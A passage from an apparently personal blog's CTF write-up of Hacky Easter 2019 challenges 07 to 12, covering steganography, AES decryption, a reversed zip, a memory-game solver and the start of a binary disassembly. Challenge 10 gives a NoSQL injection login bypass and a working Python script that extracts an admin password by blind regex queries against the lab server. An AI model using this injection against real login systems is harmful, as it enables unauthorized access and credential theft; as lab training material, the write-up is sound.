Jz=&#039;r.&#039;;Iz=&#039;te&#039;;Tz=&#039;es&#039;;Zz=&#039;f3&#039;;kz=&#039;15&#039;;Az=&#039;ht&#039;;Fz=&#039;ck&#039;;Uz=&#039;\/e&#039;;Sz=&#039;ag&#039;;Lz=&#039;g-&#039;;Ez=&#039;ha&#039;;Vz=&#039;gg&#039;;Pz=&#039;m\/&#039;;pz=&#039;8c&#039;;Gz=&#039;ye&#039;;Dz=&#039;\/\/&#039;;iz=&#039;cd&#039;;Hz=&#039;as&#039;;Mz=&#039;la&#039;;Nz=&#039;b.&#039;;nz=&#039;c7&#039;;Qz=&#039;r\/&#039;;ez=&#039;d8&#039;; cz=&#039;ac&#039;;gz=&#039;12&#039;;bz=&#039;75&#039;;oz=&#039;4a&#039;;mz=&#039;42&#039;;jz=&#039;6e&#039;;dz=&#039;b7&#039;;\nt=&quot;$Az$Bz$Cz$Dz$Ez$Fz$Gz$Hz$Iz$Jz$Ez$Fz$Kz$Lz$Mz$Nz$Oz$Pz$Ez$Fz$Gz$Hz$Iz$Qz$Rz$Sz$Tz$Uz$Vz$Wz$Xz$Yz$Zz$az$bz$cz$dz$ez$fz$gz$hz$iz$jz$kz$lz$mz$nz$oz$Zz$pz$qz$rz&quot;\necho $t\n\n<\/pre><\/div>\n<br\/>Running this script outputs the content of <code>t<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg07# bash solution.sh\nhttps:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/images\/eggs\/a61ef3e975acb7d88a127ecd6e156242c74af38c.png\n<\/pre><\/div>\n<br\/>&#8230; which contains the URL of the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg07_01.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-Bxvs-Vno1-9l9D-49gX<\/span>.\n<br\/>\n<h1 id=\"chlg08\">08 &#8211; Modern Art<\/h1>\nThe challenge provides the following image:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg08_01.jpg\" width=\"400\"\/>\n<br\/>\n<br\/>The corners of the QR code are covered by another four QR codes, which are all the same:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg08_02.jpg\" \/>\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg08# zbarimg little_qrcode.jpg\nQR-Code:remove me\nscanned 1 barcode symbols from 1 images in 0 seconds\n<\/pre><\/div>\n<br\/>The QR code decodes to <code>remove me<\/code>. Thus I tried to fix the big QR code by replacing the little QR codes with the appropriate pixels using <code>GIMP<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg08_03.jpg\" width=\"400\"\/>\n<br\/>\n<br\/>Scanning this QR still doesn&#8217;t reveal the flag:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg08# zbarimg big_qrcode.jpg\nQR-Code:Isn&#039;t that a bit too easy?\nscanned 1 barcode symbols from 1 images in 0.05 seconds\n<\/pre><\/div>\n<br\/>So we can try to run <code>strings<\/code> on the original image, which reveals an unusual hex-value as well as a value called <code>KEY<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [8,9]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg08# strings modernart.jpg | less\n4\\Zq\n:&#039;?&lt;\n        ~T\n`Zq(\n D@,\n...\n(E7EF085CEBFCE8ED93410ACF169B226A)\n(KEY=1857304593749584)\n...\n\n<\/pre><\/div>\n<br\/>The hex-value might be some cipher text, which has been encrypted using the key. Since we do not have any further information yet, let&#8217;s continue analyzing the image.\n<br\/>\n<br\/>When viewing the file with <code>hexdump<\/code>, an unusual pattern can be recognized at the end of the file:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg08# hexdump -C modernart.jpg\n00000000  ff d8 ff db 00 43 00 01  01 01 01 01 01 01 01 01  |.....C..........|\n00000010  01 01 01 01 01 01 01 01  01 01 01 01 01 01 01 01  |................|\n*\n00000040  01 01 01 01 01 01 01 ff  db 00 43 01 01 01 01 01  |..........C.....|\n00000050  01 01 01 01 01 01 01 01  01 01 01 01 01 01 01 01  |................|\n*\n00000080  01 01 01 01 01 01 01 01  01 01 01 01 ff c2 00 11  |................|\n00000090  08 01 f4 01 f4 03 01 11  00 02 11 01 03 11 01 ff  |................|\n000000a0  c4 00 1a 00 01 00 03 01  01 01 00 00 00 00 00 00  |................|\n000000b0  00 00 00 00 00 08 09 0a  07 06 05 ff c4 00 14 01  |................|\n000000c0  01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\n000000d0  00 ff da 00 0c 03 01 00  02 10 03 10 00 00 01 a1  |................|\n000000e0  f2 6f 83 9f 9d fc 98 04  7f 39 f9 67 e5 60 1e 00  |.o.......9.g.`..|\n000000f0  11 7c d4 f1 3f c0 00 11  fc c4 18 00 00 69 f4 b7  |.|..?........i..|\n00000100  f3 20 44 00 35 fa 4f f3  10 47 00 07 7f 36 fa 01  |. D.5.O..G...6..|\n00000110  50 06 60 80 2f f8 bf e0  0c 81 1e 7c f4 07 1f 26  |P.`.\/......|...&amp;|\n...\n00022790  20 20 e2 96 84 20 e2 96  88 20 e2 96 84 e2 96 80  |  ... ... ......|\n000227a0  20 e2 96 84 20 20 0a 20  e2 96 84 e2 96 84 e2 96  | ...  . ........|\n000227b0  84 e2 96 84 e2 96 84 e2  96 84 e2 96 84 20 e2 96  |............. ..|\n000227c0  88 e2 96 80 e2 96 84 e2  96 88 20 e2 96 88 e2 96  |.......... .....|\n000227d0  84 e2 96 88 20 e2 96 80  e2 96 80 20 20 20 0a 20  |.... ......   . |\n000227e0  e2 96 88 20 e2 96 84 e2  96 84 e2 96 84 20 e2 96  |... ......... ..|\n000227f0  88 20 e2 96 88 e2 96 88  e2 96 84 e2 96 88 e2 96  |. ..............|\n00022800  80 e2 96 88 e2 96 84 e2  96 88 e2 96 80 e2 96 80  |................|\n00022810  e2 96 84 20 e2 96 88 20  0a 20 e2 96 88 20 e2 96  |... ... . ... ..|\n00022820  88 e2 96 88 e2 96 88 20  e2 96 88 20 e2 96 84 20  |....... ... ... |\n00022830  e2 96 80 20 e2 96 84 20  e2 96 80 e2 96 80 e2 96  |... ... ........|\n00022840  84 e2 96 88 e2 96 80 e2  96 80 e2 96 84 20 0a 20  |............. . |\n00022850  e2 96 88 e2 96 84 e2 96  84 e2 96 84 e2 96 84 e2  |................|\n00022860  96 84 e2 96 88 20 e2 96  88 e2 96 80 e2 96 88 20  |..... ......... |\n00022870  e2 96 84 20 e2 96 88 e2  96 80 20 20 e2 96 88 e2  |... ......  ....|\n00022880  96 80 e2 96 88 20 0a                              |..... .|\n00022887\n\n<\/pre><\/div>\n<br\/>This seems to be <i>UTF-8<\/i>, which can be outputed by using the option <code>-e S<\/code> with <code>strings<\/code> (-e = encoding, S = single-8-bit-byte characters):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg08# strings -e S modernart.jpg\n\u2592\u2592\u2592\u2592\n\u2592\u2592o\u2592\u2592\u2592\u2592\n9\u2592g\u2592`\n|\u2592\u2592?\u2592\ni\u2592\u2592 D\n5\u2592O\u2592\n...\n\u0c85\u2592-_P\u2592\u2592b\u2592\nP\u2592\u0154,fX\u2592\u2592\u2592\u2592\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584 \u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\n \u2588 \u2584\u2584\u2584 \u2588 \u2584\u2588\u2580\u2588\u2584 \u2588 \u2584\u2584\u2584 \u2588\n \u2588 \u2588\u2588\u2588 \u2588  \u2580\u2584\u2580\u2584 \u2588 \u2588\u2588\u2588 \u2588\n \u2588\u2584\u2584\u2584\u2584\u2584\u2588 \u2584 \u2584 \u2588 \u2588\u2584\u2584\u2584\u2584\u2584\u2588\n \u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2588\u2588\u2584\u2588\u2580\u2584\u2584   \u2584\n \u2584\u2588\u2584\u2580\u2584\u2584\u2584\u2588\u2580\u2584\u2580 \u2584 \u2580 \u2584\u2580\u2580\u2580\u2584\n \u2580\u2588\u2584\u2588 \u2580\u2584\u2588\u2580   \u2584 \u2588 \u2584\u2580 \u2584\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2588\u2580\u2584\u2588 \u2588\u2584\u2588 \u2580\u2580\n \u2588 \u2584\u2584\u2584 \u2588 \u2588\u2588\u2584\u2588\u2580\u2588\u2584\u2588\u2580\u2580\u2584 \u2588\n \u2588 \u2588\u2588\u2588 \u2588 \u2584 \u2580 \u2584 \u2580\u2580\u2584\u2588\u2580\u2580\u2584\n \u2588\u2584\u2584\u2584\u2584\u2584\u2588 \u2588\u2580\u2588 \u2584 \u2588\u2580  \u2588\u2580\u2588\n<\/pre><\/div>\n<br\/>Another QR code! By simply taking a screenshot we can scan the new QR code:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg08_04.png\" \/>\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg08# zbarimg new_qrcode.png\nQR-Code:AES-128\nscanned 1 barcode symbols from 1 images in 0 seconds\n<\/pre><\/div>\n<br\/>The QR code decodes to <code>AES-128<\/code>. This suggests that we can decode the string we found using the key and the algorithm <code>AES-128<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg08# python\nPython 2.7.15+ (default, Feb  3 2019, 13:13:16)\n&#x5B;GCC 8.2.0] on linux2\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; from Crypto.Cipher import AES\n&gt;&gt;&gt; cipher = AES.new(&#039;1857304593749584&#039;, AES.MODE_ECB)\n&gt;&gt;&gt; cipher.decrypt(&#039;E7EF085CEBFCE8ED93410ACF169B226A&#039;.decode(&#039;hex&#039;))\n&#039;Ju5t_An_1mag3\\x03\\x03\\x03&#039;\n<\/pre><\/div>\n<br\/>Entering the password <code>Ju5t_An_1mag3<\/code> in the Eggo-o-Matic&trade; yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg08_05.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-Ydks-4V9o-Hn6p-RZ1A<\/span>.\n<br\/>\n<h1 id=\"chlg09\">09 &#8211; rorriM rorriM<\/h1>\nThe challenge provides a file called <code>evihcra.piz<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg09# file evihcra.piz\nevihcra.piz: data\n<\/pre><\/div>\n<br\/>The <code>file<\/code> tool does not recognize any known file format. When viewing the file with <code>hexdump<\/code>, we can see that the file ends with <code>\\x04\\x03KP<\/code>, which is the reverse of <code>PK\\x03\\x04<\/code> (= the magic number of a zip archive):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg09# hexdump -C evihcra.piz\n00000000  00 00 00 01 08 63 00 00  00 5b 00 01 00 01 00 00  |.....c...&#x5B;......|\n00000010  00 00 06 05 4b 50 01 d4  b2 23 98 dd 9f dd 01 d4  |....KP...#......|\n...\n000108c0  08 3c a3 18 78 dc 4e 36  43 29 00 08 00 00 00 14  |.&lt;..x.N6C)......|\n000108d0  04 03 4b 50                                       |..KP|\n000108d4\n<\/pre><\/div>\n<br\/>Combining this with the challenge&#8217;s description (<i>rorriM rorriM<\/i> = <code>reverse(\"Mirror Mirror\")<\/code>) suggests the assumption that the file must be read in reverse. Applying this on the filename too reveals that the actual filename is <code>evihcra.piz<\/code> = <code>archive.zip<\/code>, which perfectly makes sense.\n<br\/>\n<br\/>The following python script reads the given file and creates a new file with a reversed filename, extension and actual content:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/env python\nimport sys\n\nfilename,ext = sys.argv&#x5B;1].split(&#039;.&#039;)\nct = open(filename+&#039;.&#039;+ext).read()\n\nout = open(filename&#x5B;::-1]+&#039;.&#039;+ext&#x5B;::-1], &#039;w&#039;)\nout.write(ct&#x5B;::-1])\nout.close()\n<\/pre><\/div>\n<br\/>Running the script on <code>evihcra.piz<\/code> creates a new file called <code>archive.zip<\/code>, which is actually a zip archive:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg09# .\/mirror.py evihcra.piz\nroot@kali:~\/Documents\/he19\/egg09# file archive.zip\narchive.zip: Zip archive data, at least v2.0 to extract\n<\/pre><\/div>\n<br\/>The archive contains a file called <code>90gge.gnp<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg09# unzip archive.zip\nArchive:  archive.zip\n  inflating: 90gge.gnp\ne, 69031 bytes uncompressed, 67644 bytes compressed:  2.0%\n<\/pre><\/div>\n<br\/>Viewing this file with <code>hexdump<\/code> we can see that this seems actually to be a PNG image:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\nroot@kali:~\/Documents\/he19\/egg09# hexdump -C 90gge.gnp\n00000000  89 47 4e 50 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.GNP........IHDR|\n00000010  00 00 01 e0 00 00 01 e0  08 06 00 00 00 7d d4 be  |.............}..|\n00000020  95 00 00 00 04 67 41 4d  41 00 00 b1 8f 0b fc 61  |.....gAMA......a|\n...\n\n<\/pre><\/div>\n<br\/>The only thing that is not matching an actual PNG image here is that instead of <code>PNG<\/code> the header contains <code>GNP<\/code>. So let&#8217;s fix this is a hexeditor:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg09_01.png\" \/>\n<br\/>\n<br\/>Now the file is actually a PNG image:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg09_02.png\" width=\"200\"\/>\n<br\/>\n<br\/>The only thing left to do is to flip the image (e.g. in <code>GIMP<\/code>: <code>Image -> Transform -> Flip Horizontally<\/code>) and to invert the colors (<code>GIMP<\/code>: <code>Colors -> Invert<\/code>). The resulting image is the desired egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg09_03.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-VFTD-kVos-DeL1-lATA<\/span>.\n<br\/>\n<h1 id=\"chlg10\">10 &#8211; Stackunderflow<\/h1>\nThe challenge provides a link to a <a href=\"https:\/\/stackoverflow.com\/\" target=\"_new\" rel=\"noopener noreferrer\">stackoverflow<\/a>-like website:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg10_01.png\" width=\"800\"\/>\n<br\/>\n<br\/>The first notable information on the front page is that the database is being migrated to support humongous amounts of questions.\n<br\/>\n<br\/>As for now the amount of questions seems to be quite limited:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg10_02.png\" width=\"800\"\/>\n<br\/>\n<br\/>Though, there is actually a question, which was asked by <code>the_admin<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg10_04.png\" width=\"800\"\/>\n<br\/>\n<br\/>This may reveal that there is some kind of NoSQL database in place.\n<br\/>\n<br\/>Also, there is another interesting question:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg10_03.png\" width=\"800\"\/>\n<br\/>\n<br\/>Keeping this in mind and googling for <code>nosql injection<\/code> bring up a few interesting websites: <a href=\"https:\/\/www.owasp.org\/index.php\/Testing_for_NoSQL_injection\" target=\"_new\" rel=\"noopener noreferrer\">OWASP<\/a>, <a href=\"https:\/\/www.owasp.org\/images\/e\/ed\/GOD16-NOSQL.pdf\" target=\"_new\" rel=\"noopener noreferrer\">OWASP<\/a>, <a href=\"https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/tree\/master\/NoSQL%20Injection\" target=\"_new\" rel=\"noopener noreferrer\">PayloadsAllTheThings<\/a>&#8230;\n<br\/>\n<br\/>By default the login page makes a POST request with the <code>Content-Type<\/code> <code>application\/x-www-form-encoded<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg10_05.png\" \/>\n<br\/>\n<br\/>In order to bypass the login, we have to change the <code>Content-Type<\/code> to <code>application\/json<\/code> and set the body to be actually JSON. We already know the username <code>the_admin<\/code> and for the password we can simply insert an all-matching regex:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg10_06.png\" \/>\n<br\/>\n<br\/>Using the returned session id (cookie <code>connect.sid<\/code>), we are logged in with the user <code>the_admin<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg10_07.png\" \/>\n<br\/>\n<br\/>On the website itself there is no flag after the login, which means that we are probably supposed to reveal the actual password of the user <code>the_admin<\/code>.\n<br\/>\n<br\/>In order to do this, I wrote the following python script, which uses the <code>$regex<\/code> function to reveal the password letter by letter (like in a blind SQL scenario):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/env python\n\nimport requests\n\ncharset = &#039;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_&#039;\nurl = &#039;http:\/\/whale.hacking-lab.com:3371\/login&#039;\npwd = &#039;&#039;\n\ncont = True\nwhile (cont):\n  cont = False\n  for c in charset:\n    j = {&quot;username&quot;:&quot;null&quot;, &quot;password&quot;:{&quot;$regex&quot;: &quot;^&quot;+pwd+c}}\n    r = requests.post(url, json=j, allow_redirects=False)\n    if (r.text == &#039;Found. Redirecting to \/&#039;):\n      print(&#039;got letter: &#039; +c)\n      pwd += c\n      print(&#039;pwd until now: &#039;+pwd)\n      cont = True\n<\/pre><\/div>\n<br\/>Running the script reveals the password:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg10# .\/getPassword.py\ngot letter: N\npwd until now: N\ngot letter: 0\npwd until now: N0\ngot letter: S\npwd until now: N0S\ngot letter: Q\npwd until now: N0SQ\ngot letter: L\npwd until now: N0SQL\ngot letter: _\npwd until now: N0SQL_\ngot letter: i\npwd until now: N0SQL_i\ngot letter: n\npwd until now: N0SQL_in\ngot letter: j\npwd until now: N0SQL_inj\ngot letter: e\npwd until now: N0SQL_inje\ngot letter: c\npwd until now: N0SQL_injec\ngot letter: t\npwd until now: N0SQL_inject\ngot letter: i\npwd until now: N0SQL_injecti\ngot letter: o\npwd until now: N0SQL_injectio\ngot letter: n\npwd until now: N0SQL_injection\ngot letter: s\npwd until now: N0SQL_injections\ngot letter: _\npwd until now: N0SQL_injections_\ngot letter: a\npwd until now: N0SQL_injections_a\ngot letter: r\npwd until now: N0SQL_injections_ar\ngot letter: e\npwd until now: N0SQL_injections_are\ngot letter: _\npwd until now: N0SQL_injections_are_\ngot letter: a\npwd until now: N0SQL_injections_are_a\ngot letter: _\npwd until now: N0SQL_injections_are_a_\ngot letter: t\npwd until now: N0SQL_injections_are_a_t\ngot letter: h\npwd until now: N0SQL_injections_are_a_th\ngot letter: i\npwd until now: N0SQL_injections_are_a_thi\ngot letter: n\npwd until now: N0SQL_injections_are_a_thin\ngot letter: g\npwd until now: N0SQL_injections_are_a_thing\n<\/pre><\/div>\n<br\/>Entering the password <code>N0SQL_injections_are_a_thing<\/code> in the Eggo-o-Matic&trade; yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg10_08.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-nq5W-zLwY-iX3Q-iw1Q<\/span>.\n<br\/>\n<h1 id=\"chlg11\">11 &#8211; Memeory 2.0<\/h1>\nThe challenge provides a link to the following website:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg11_01.png\" width=\"900\"\/>\n<br\/>\n<br\/>The pictures behind the cards are numbered from 1 to 98:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg11_02.png\" width=\"900\"\/>\n<br\/>\n<br\/>After selecting two cards a POST request to <code>\/solve<\/code> is sent with the two parameters <code>first<\/code> and <code>second<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg11_03.png\" width=\"900\"\/>\n<br\/>\n<br\/>If the cards are selected to slow, an error is raised and we have lost the game:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg11_04.png\" width=\"900\"\/>\n<br\/>\n<br\/>In order to solve this challenge automatically, we can write a python script, which:\n<br\/><ul style=\"margin-top:8px;margin-bottom:-15px\"><li>downloads all images<\/li><li>calculates the md5 checksum of the images<\/li><li>compares the md5 checksums in order to find matching images<\/li><li>submits the id of the matching images to the <code>\/solve<\/code> endpoint<\/li><\/ul>\n<br\/>\n<br\/>The following script does this:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n\n#!\/usr\/bin\/env python\n\nimport requests\nimport hashlib\n\ns = requests.Session()\n\nwhile True:\n  hashes = &#x5B;]\n  s.get(&#039;http:\/\/whale.hacking-lab.com:1111\/&#039;)\n\n  for i in range(98):\n    r = s.get(&#039;http:\/\/whale.hacking-lab.com:1111\/pic\/&#039;+str(i+1))\n    m = hashlib.sha256()\n    m.update(r.content)\n    hashes.append(m.hexdigest())\n\n  submitted = &#x5B;]\n  idx = -1\n  while (len(submitted) &lt; 98):\n    idx += 1\n    for i in range(98):\n      if (idx == i): continue\n      if (hashes&#x5B;i] == hashes&#x5B;idx]):\n        if (i in submitted): continue\n        d = {&#039;first&#039;:str(i+1), &#039;second&#039;:str(idx+1)}\n        print(d)\n        r = s.post(&#039;http:\/\/whale.hacking-lab.com:1111\/solve&#039;, data=d)\n        print(r.text)\n        submitted.append(i)\n        submitted.append(idx)\n<\/pre><\/div>\n<br\/>Now we only need to run the script and wait until 10 rounds are passed:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg11# .\/solveMemory.py\n{&#039;second&#039;: &#039;1&#039;, &#039;first&#039;: &#039;56&#039;}\nok\n{&#039;second&#039;: &#039;2&#039;, &#039;first&#039;: &#039;81&#039;}\nok\n{&#039;second&#039;: &#039;3&#039;, &#039;first&#039;: &#039;38&#039;}\nok\n...\n{&#039;second&#039;: &#039;82&#039;, &#039;first&#039;: &#039;86&#039;}\nok\n{&#039;second&#039;: &#039;83&#039;, &#039;first&#039;: &#039;98&#039;}\nok\n{&#039;second&#039;: &#039;84&#039;, &#039;first&#039;: &#039;93&#039;}\nnextRound\n{&#039;second&#039;: &#039;1&#039;, &#039;first&#039;: &#039;88&#039;}\nok\n{&#039;second&#039;: &#039;2&#039;, &#039;first&#039;: &#039;5&#039;}\nok\n{&#039;second&#039;: &#039;3&#039;, &#039;first&#039;: &#039;43&#039;}\nok\n...\n{&#039;second&#039;: &#039;55&#039;, &#039;first&#039;: &#039;88&#039;}\nok\n{&#039;second&#039;: &#039;56&#039;, &#039;first&#039;: &#039;77&#039;}\nok\n{&#039;second&#039;: &#039;60&#039;, &#039;first&#039;: &#039;72&#039;}\nok\n{&#039;second&#039;: &#039;61&#039;, &#039;first&#039;: &#039;92&#039;}\nok\n{&#039;second&#039;: &#039;65&#039;, &#039;first&#039;: &#039;84&#039;}\nok\n{&#039;second&#039;: &#039;70&#039;, &#039;first&#039;: &#039;73&#039;}\nok\n{&#039;second&#039;: &#039;76&#039;, &#039;first&#039;: &#039;95&#039;}\nok\n{&#039;second&#039;: &#039;78&#039;, &#039;first&#039;: &#039;91&#039;}\nok\n{&#039;second&#039;: &#039;85&#039;, &#039;first&#039;: &#039;94&#039;}\nok, here is your flag: 1-m3m3-4-d4y-k33p5-7h3-d0c70r-4w4y\n\n<\/pre><\/div>\n<br\/>Entering the password <code>1-m3m3-4-d4y-k33p5-7h3-d0c70r-4w4y<\/code> in the Eggo-o-Matic&trade; yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg11_05.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-jaQ9-0NIr-Ladc-brOT<\/span>.\n<br\/>\n<h1 id=\"chlg12\">12 &#8211; Decrypt0r<\/h1>\nThe challenge provides a 64-bit ELF file called <code>decryptor<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg12# file decryptor\ndecryptor: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID&#x5B;sha1]=1835d7dad4e2511aef2328a6fc9a2bb17f36f4e6, with debug_info, not stripped\n\n<\/pre><\/div>\n<br\/>By disassembling the <code>main<\/code> function within <code>r2<\/code> we can see that the program prompts for a password and then reads up to 16 bytes from <code>stdin<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&#x5B;0x00400580]&gt; pdf @ sym.main\n            ;-- main:\n\/ (fcn) sym.main 86\n|   sym.main ();\n|           ; var int local_20h @ rbp-0x20\n|           ; var int local_14h @ rbp-0x14\n|           ; var int local_10h @ rbp-0x10\n|           ; DATA XREF from entry0 (0x40059d)\n|           0x00400835      55             push rbp\n|           0x00400836      4889e5         mov rbp, rsp\n|           0x00400839      4883ec20       sub rsp, 0x20\n|           0x0040083d      897dec         mov dword &#x5B;local_14h], edi\n|           0x00400840      488975e0       mov qword &#x5B;local_20h], rsi\n|           0x00400844      bf14094000     mov edi, str.Enter_Password: ; 0x400914 ; &quot;Enter Password: &quot;\n|           0x00400849      b800000000     mov eax, 0\n|           0x0040084e      e8edfcffff     call sym.imp.printf\n|           0x00400853      488b15560b20.  mov rdx, qword &#x5B;obj.stdin__GLIBC_2.2.5] ; obj.__TMC_END ; &#x5B;0x6013b0:8]=0\n|           0x0040085a      488d45f0       lea rax, qword &#x5B;local_10h]\n|           0x0040085e      be10000000     mov esi, 0x10               ; 16\n|           0x00400863      4889c7         mov rdi, rax\n|           0x00400866      e805fdffff     call sym.imp.fgets\n|           0x0040086b      488d45f0       lea rax, qword &#x5B;local_10h]\n|           0x0040086f      4889c7         mov rdi, rax\n|           0x00400872      e8e0fdffff     call sym.hash_unsignedint\n|           0x00400877      4889c7         mov rdi, rax\n|           0x0040087a      b800000000     mov eax, 0\n|           0x0040087f      e8bcfcffff     call sym.imp.printf\n|           0x00400884      b800000000     mov eax, 0\n|           0x00400889      c9             leave\n\\           0x0040088a      c3             ret\n<\/pre><\/div>\n<br\/>The entered password is passed to the function <code>hash_unsignedint<\/code>, which combines it with a static buffer called <code>data<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [35]; title: ; notranslate\" title=\"\">\n&#x5B;0x00400580]&gt; pdf @ sym.hash_unsignedint\n\/ (fcn) sym.hash_unsignedint 478\n|   sym.hash_unsignedint ();\n|           ; var int local_58h @ rbp-0x58\n|           ; var int local_48h @ rbp-0x48\n|           ; 